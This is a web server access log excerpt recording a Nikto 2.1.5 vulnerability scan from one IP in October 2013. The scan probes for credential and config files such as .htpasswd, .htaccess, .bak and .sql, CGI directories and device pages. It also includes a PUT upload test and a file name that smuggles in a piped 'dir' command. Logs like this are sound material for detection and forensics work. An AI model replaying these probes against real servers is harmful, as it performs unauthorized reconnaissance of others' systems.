  140. 84.56.69.222 - - [23/Oct/2013:15:20:02 +0400] "GET /IWnWs8Cl.pwd HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  141. 84.56.69.222 - - [23/Oct/2013:15:20:02 +0400] "GET /IWnWs8Cl.xbb HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  142. 84.56.69.222 - - [23/Oct/2013:15:20:03 +0400] "GET /IWnWs8Cl.txt HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  143. 84.56.69.222 - - [23/Oct/2013:15:20:04 +0400] "GET /IWnWs8Cl.btr HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  144. 84.56.69.222 - - [23/Oct/2013:15:20:04 +0400] "GET /IWnWs8Cl.cfg HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  145. 84.56.69.222 - - [23/Oct/2013:15:20:33 +0400] "GET /IWnWs8Cl._ HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  146. 84.56.69.222 - - [23/Oct/2013:15:20:44 +0400] "GET /IWnWs8Cl.TXT HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  147. 84.56.69.222 - - [23/Oct/2013:15:20:51 +0400] "GET /IWnWs8Cl.iso8859-2 HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  148. 84.56.69.222 - - [23/Oct/2013:15:20:51 +0400] "GET /IWnWs8Cl.old HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  149. 84.56.69.222 - - [23/Oct/2013:15:20:52 +0400] "GET /IWnWs8Cl.inc+ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  150. 84.56.69.222 - - [23/Oct/2013:15:20:54 +0400] "GET /IWnWs8Cl.htw HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  151. 84.56.69.222 - - [23/Oct/2013:15:20:55 +0400] "GET /IWnWs8Cl.htpasswd HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  152. 84.56.69.222 - - [23/Oct/2013:15:20:55 +0400] "GET /IWnWs8Cl.et HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  153. 84.56.69.222 - - [23/Oct/2013:15:20:56 +0400] "GET /IWnWs8Cl.cnf HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  154. 84.56.69.222 - - [23/Oct/2013:15:20:56 +0400] "GET /IWnWs8Cl.de HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  155. 84.56.69.222 - - [23/Oct/2013:15:20:56 +0400] "GET /IWnWs8Cl.fhp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  156. 84.56.69.222 - - [23/Oct/2013:15:20:57 +0400] "GET /IWnWs8Cl.xtp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  157. 84.56.69.222 - - [23/Oct/2013:15:21:07 +0400] "GET /IWnWs8Cl.chl+ HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  158. 84.56.69.222 - - [23/Oct/2013:15:21:07 +0400] "GET /IWnWs8Cl.bat HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  159. 84.56.69.222 - - [23/Oct/2013:15:21:08 +0400] "GET /IWnWs8Cl.UploadServlet HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  160. 84.56.69.222 - - [23/Oct/2013:15:21:08 +0400] "GET /IWnWs8Cl.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  161. 84.56.69.222 - - [23/Oct/2013:15:21:16 +0400] "GET /IWnWs8Cl.nlm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  162. 84.56.69.222 - - [23/Oct/2013:15:21:16 +0400] "GET /IWnWs8Cl.access HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  163. 84.56.69.222 - - [23/Oct/2013:15:21:17 +0400] "GET /IWnWs8Cl.java HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  164. 84.56.69.222 - - [23/Oct/2013:15:21:17 +0400] "GET /IWnWs8Cl.SHOW HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  165. 84.56.69.222 - - [23/Oct/2013:15:21:17 +0400] "GET /IWnWs8Cl.phtml HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  166. 84.56.69.222 - - [23/Oct/2013:15:21:17 +0400] "GET /IWnWs8Cl.Htm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  167. 84.56.69.222 - - [23/Oct/2013:15:21:18 +0400] "GET /IWnWs8Cl.properties HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  168. 84.56.69.222 - - [23/Oct/2013:15:21:18 +0400] "GET /IWnWs8Cl.EXE HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  169. 84.56.69.222 - - [23/Oct/2013:15:21:28 +0400] "GET /IWnWs8Cl.nsf HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  170. 84.56.69.222 - - [23/Oct/2013:15:21:28 +0400] "GET /IWnWs8Cl.exe|dir HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  171. 84.56.69.222 - - [23/Oct/2013:15:21:28 +0400] "GET /IWnWs8Cl.1 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  172. 84.56.69.222 - - [23/Oct/2013:15:21:29 +0400] "GET /IWnWs8Cl.csc HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  173. 84.56.69.222 - - [23/Oct/2013:15:21:29 +0400] "GET /IWnWs8Cl.dk HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  174. 84.56.69.222 - - [23/Oct/2013:15:21:30 +0400] "GET /IWnWs8Cl.jsp+ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  175. 84.56.69.222 - - [23/Oct/2013:15:21:30 +0400] "GET /IWnWs8Cl.ncf HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  176. 84.56.69.222 - - [23/Oct/2013:15:21:30 +0400] "GET /IWnWs8Cl.dll HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  177. 84.56.69.222 - - [23/Oct/2013:15:21:31 +0400] "GET /IWnWs8Cl.tw HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  178. 84.56.69.222 - - [23/Oct/2013:15:21:31 +0400] "GET /IWnWs8Cl.cobalt HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  179. 84.56.69.222 - - [23/Oct/2013:15:21:32 +0400] "GET /IWnWs8Cl.BBoardServlet HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  180. 84.56.69.222 - - [23/Oct/2013:15:21:32 +0400] "GET /IWnWs8Cl.pdf HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  181. 84.56.69.222 - - [23/Oct/2013:15:21:33 +0400] "GET /IWnWs8Cl/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  182. 84.56.69.222 - - [23/Oct/2013:15:21:34 +0400] "GET /IWnWs8Cl.iso2022-jp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  183. 84.56.69.222 - - [23/Oct/2013:15:21:34 +0400] "GET /IWnWs8Cl.htaccess HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  184. 84.56.69.222 - - [23/Oct/2013:15:21:34 +0400] "GET /IWnWs8Cl.bas:ShowVolume HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  185. 84.56.69.222 - - [23/Oct/2013:15:21:34 +0400] "GET /.IWnWs8Cl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  186. 84.56.69.222 - - [23/Oct/2013:15:21:35 +0400] "GET /IWnWs8Cl.cp-1251 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  187. 84.56.69.222 - - [23/Oct/2013:15:21:35 +0400] "GET /IWnWs8Cl.js HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  188. 84.56.69.222 - - [23/Oct/2013:15:21:56 +0400] "GET /IWnWs8Cl.aspx HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  189. 84.56.69.222 - - [23/Oct/2013:15:21:56 +0400] "GET /IWnWs8Cl.x-shop HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  190. 84.56.69.222 - - [23/Oct/2013:15:21:57 +0400] "GET /IWnWs8Cl.sys HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  191. 84.56.69.222 - - [23/Oct/2013:15:21:57 +0400] "GET /IWnWs8Cl.fr HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  192. 84.56.69.222 - - [23/Oct/2013:15:21:57 +0400] "GET /IWnWs8Cl.mdb+ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  193. 84.56.69.222 - - [23/Oct/2013:15:21:59 +0400] "GET /IWnWs8Cl.nsconfig HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  194. 84.56.69.222 - - [23/Oct/2013:15:21:59 +0400] "GET /IWnWs8Cl.tcl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  195. 84.56.69.222 - - [23/Oct/2013:15:22:00 +0400] "GET /IWnWs8Cl.config HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  196. 84.56.69.222 - - [23/Oct/2013:15:22:00 +0400] "GET /IWnWs8Cl.jse HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  197. 84.56.69.222 - - [23/Oct/2013:15:22:00 +0400] "GET /IWnWs8Cl.idc HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  198. 84.56.69.222 - - [23/Oct/2013:15:22:01 +0400] "GET /IWnWs8Cl.thtml HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  199. 84.56.69.222 - - [23/Oct/2013:15:22:01 +0400] "GET /IWnWs8Cl.jsp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  200. 84.56.69.222 - - [23/Oct/2013:15:22:01 +0400] "GET /IWnWs8Cl.* HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  201. 84.56.69.222 - - [23/Oct/2013:15:22:01 +0400] "GET /IWnWs8Cl.htaccess~ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  202. 84.56.69.222 - - [23/Oct/2013:15:22:01 +0400] "GET /IWnWs8Cl.html~ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  203. 84.56.69.222 - - [23/Oct/2013:15:22:02 +0400] "GET /IWnWs8Cl.pt HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  204. 84.56.69.222 - - [23/Oct/2013:15:22:23 +0400] "GET /IWnWs8Cl.dtd HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  205. 84.56.69.222 - - [23/Oct/2013:15:22:23 +0400] "GET /IWnWs8Cl.config~ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  206. 84.56.69.222 - - [23/Oct/2013:15:22:24 +0400] "GET /IWnWs8Cl.render_css HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  207. 84.56.69.222 - - [23/Oct/2013:15:22:24 +0400] "GET /IWnWs8Cl.it HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  208. 84.56.69.222 - - [23/Oct/2013:15:22:25 +0400] "GET /IWnWs8Cl.tmp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  209. 84.56.69.222 - - [23/Oct/2013:15:22:25 +0400] "GET /IWnWs8Cl.wwwacl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  210. 84.56.69.222 - - [23/Oct/2013:15:22:25 +0400] "GET /IWnWs8Cl.00RelNotes HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  211. 84.56.69.222 - - [23/Oct/2013:15:22:25 +0400] "GET /IWnWs8Cl.show HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  212. 84.56.69.222 - - [23/Oct/2013:15:22:25 +0400] "GET /IWnWs8Cl.c HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  213. 84.56.69.222 - - [23/Oct/2013:15:22:26 +0400] "GET /IWnWs8Cl.pt-br HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  214. 84.56.69.222 - - [23/Oct/2013:15:22:26 +0400] "GET /IWnWs8Cl.sql HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  215. 84.56.69.222 - - [23/Oct/2013:15:22:39 +0400] "GET /IWnWs8Cl.bak HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  216. 84.56.69.222 - - [23/Oct/2013:15:22:39 +0400] "GET /IWnWs8Cl.signature HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  217. 84.56.69.222 - - [23/Oct/2013:15:22:40 +0400] "GET /IWnWs8Cl.pl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  218. 84.56.69.222 - - [23/Oct/2013:15:22:40 +0400] "GET /index.php? HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:map_codes)"
  219. 84.56.69.222 - - [23/Oct/2013:15:23:01 +0400] "GET /webcgi/ HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:cgi dir check)"
  220. 84.56.69.222 - - [23/Oct/2013:15:23:01 +0400] "GET /cgi-914/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:cgi dir check)"
  221. 84.56.69.222 - - [23/Oct/2013:15:23:02 +0400] "GET /cgi-915/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:cgi dir check)"
  222. 84.56.69.222 - - [23/Oct/2013:15:23:02 +0400] "GET /bin/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:cgi dir check)"
  223. 84.56.69.222 - - [23/Oct/2013:15:23:03 +0400] "GET /cgi/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:cgi dir check)"
  224. 84.56.69.222 - - [23/Oct/2013:15:23:03 +0400] "GET /mpcgi/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:cgi dir check)"
  225. 84.56.69.222 - - [23/Oct/2013:15:23:03 +0400] "GET /cgi-bin/ HTTP/1.1" 403 272 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:cgi dir check)"
  226. 84.56.69.222 - - [23/Oct/2013:15:23:03 +0400] "GET /ows-bin/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:cgi dir check)"
  227. 84.56.69.222 - - [23/Oct/2013:15:23:03 +0400] "GET /cgi-sys/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:cgi dir check)"
  228. 84.56.69.222 - - [23/Oct/2013:15:23:03 +0400] "GET /cgi-local/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:cgi dir check)"
  229. 84.56.69.222 - - [23/Oct/2013:15:23:03 +0400] "GET /htbin/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:cgi dir check)"
  230. 84.56.69.222 - - [23/Oct/2013:15:23:04 +0400] "GET /cgibin/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:cgi dir check)"
  231. 84.56.69.222 - - [23/Oct/2013:15:23:04 +0400] "GET /cgis/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:cgi dir check)"
  232. 84.56.69.222 - - [23/Oct/2013:15:23:15 +0400] "GET /scripts/ HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:cgi dir check)"
  233. 84.56.69.222 - - [23/Oct/2013:15:23:15 +0400] "GET /cgi-win/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:cgi dir check)"
  234. 84.56.69.222 - - [23/Oct/2013:15:23:15 +0400] "GET /fcgi-bin/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:cgi dir check)"
  235. 84.56.69.222 - - [23/Oct/2013:15:23:16 +0400] "GET /cgi-exe/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:cgi dir check)"
  236. 84.56.69.222 - - [23/Oct/2013:15:23:16 +0400] "GET /cgi-home/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:cgi dir check)"
  237. 84.56.69.222 - - [23/Oct/2013:15:23:16 +0400] "GET /cgi-perl/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:cgi dir check)"
  238. 84.56.69.222 - - [23/Oct/2013:15:23:16 +0400] "GET /scgi-bin/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:cgi dir check)"
  239. 84.56.69.222 - - [23/Oct/2013:15:23:17 +0400] "GET / HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:robots)"
  240. 84.56.69.222 - - [23/Oct/2013:15:23:17 +0400] "GET /robots.txt HTTP/1.1" 200 27 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:robots)"
  241. 84.56.69.222 - - [23/Oct/2013:15:23:17 +0400] "GET / HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:)"
  242. 84.56.69.222 - - [23/Oct/2013:15:23:17 +0400] "GET /clientaccesspolicy.xml HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:clientaccesspolicy)"
  243. 84.56.69.222 - - [23/Oct/2013:15:23:17 +0400] "GET / HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:parked detection)"
  244. 84.56.69.222 - - [23/Oct/2013:15:23:17 +0400] "GET / HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:embedded detection)"
  245. 84.56.69.222 - - [23/Oct/2013:15:23:18 +0400] "GET / HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:embedded detection)"
  246. 84.56.69.222 - - [23/Oct/2013:15:23:18 +0400] "GET / HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:embedded detection)"
  247. 84.56.69.222 - - [23/Oct/2013:15:23:18 +0400] "GET / HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:embedded detection)"
  248. 84.56.69.222 - - [23/Oct/2013:15:23:18 +0400] "GET /hp/device/this.LCDispatcher HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:embedded detection)"
  249. 84.56.69.222 - - [23/Oct/2013:15:23:18 +0400] "GET /hp/device/this.LCDispatcher HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:embedded detection)"
  250. 84.56.69.222 - - [23/Oct/2013:15:23:19 +0400] "GET /hp/device/this.LCDispatcher HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:embedded detection)"
  251. 84.56.69.222 - - [23/Oct/2013:15:23:19 +0400] "GET /hp/device/this.LCDispatcher HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:embedded detection)"
  252. 84.56.69.222 - - [23/Oct/2013:15:23:19 +0400] "GET /hmstat.htm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:embedded detection)"
  253. 84.56.69.222 - - [23/Oct/2013:15:23:20 +0400] "GET /SoundBridgeStatus.html HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:embedded detection)"
  254. 84.56.69.222 - - [23/Oct/2013:15:23:20 +0400] "GET /eng/start/StatPtrGen.htm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:embedded detection)"
  255. 84.56.69.222 - - [23/Oct/2013:15:23:20 +0400] "GET /cab/top.shtml HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:embedded detection)"
  256. 84.56.69.222 - - [23/Oct/2013:15:23:20 +0400] "GET /home.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:embedded detection)"
  257. 84.56.69.222 - - [23/Oct/2013:15:23:21 +0400] "GET / HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:embedded detection)"
  258. 84.56.69.222 - - [23/Oct/2013:15:23:21 +0400] "GET / HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:embedded detection)"
  259. 84.56.69.222 - - [23/Oct/2013:15:23:21 +0400] "GET / HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:embedded detection)"
  260. 84.56.69.222 - - [23/Oct/2013:15:23:22 +0400] "GET / HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:apache_expect_xss)"
  261. 84.56.69.222 - - [23/Oct/2013:15:23:22 +0400] "PUT /nikto-test-VFNCyy8S.html HTTP/1.1" 405 307 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:put_del_test: PUT)"
  262. 84.56.69.222 - - [23/Oct/2013:15:23:22 +0400] "GET /~root HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:apacheusers: known user)"
  263. 84.56.69.222 - - [23/Oct/2013:15:23:23 +0400] "GET /index.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:headers: Translate-f #1)"
  264. 84.56.69.222 - - [23/Oct/2013:15:23:23 +0400] "GET /junk999.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:headers: Translate-f #1)"
  265. 84.56.69.222 - - [23/Oct/2013:15:23:24 +0400] "GET /index.aspx HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:headers: Translate-f #1)"
  266. 84.56.69.222 - - [23/Oct/2013:15:23:24 +0400] "GET /junk988.aspx HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:headers: Translate-f #1)"
  267. 84.56.69.222 - - [23/Oct/2013:15:23:24 +0400] "GET /login.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:headers: Translate-f #1)"
  268. 84.56.69.222 - - [23/Oct/2013:15:23:24 +0400] "GET /login.aspx HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:headers: Translate-f #1)"
  269. 84.56.69.222 - - [23/Oct/2013:15:23:36 +0400] "GET / HTTP/1.1" 200 47606 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:favicon)"
  270. 84.56.69.222 - - [23/Oct/2013:15:23:41 +0400] "GET /index.php HTTP/1.1" 200 47606 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:multiple_index)"
  271. 84.56.69.222 - - [23/Oct/2013:15:23:43 +0400] "GET /index.php3 HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:multiple_index)"
  272. 84.56.69.222 - - [23/Oct/2013:15:23:43 +0400] "GET /index.html HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:multiple_index)"
  273. 84.56.69.222 - - [23/Oct/2013:15:23:43 +0400] "GET /index.htm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:multiple_index)"
  274. 84.56.69.222 - - [23/Oct/2013:15:23:43 +0400] "GET /index.shtml HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:multiple_index)"
  275. 84.56.69.222 - - [23/Oct/2013:15:23:44 +0400] "GET /index.cfm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:multiple_index)"
  276. 84.56.69.222 - - [23/Oct/2013:15:23:44 +0400] "GET /index.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:multiple_index)"
  277. 84.56.69.222 - - [23/Oct/2013:15:23:57 +0400] "GET /index.pl HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:multiple_index)"
  278. 84.56.69.222 - - [23/Oct/2013:15:23:57 +0400] "GET /index.asp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:multiple_index)"
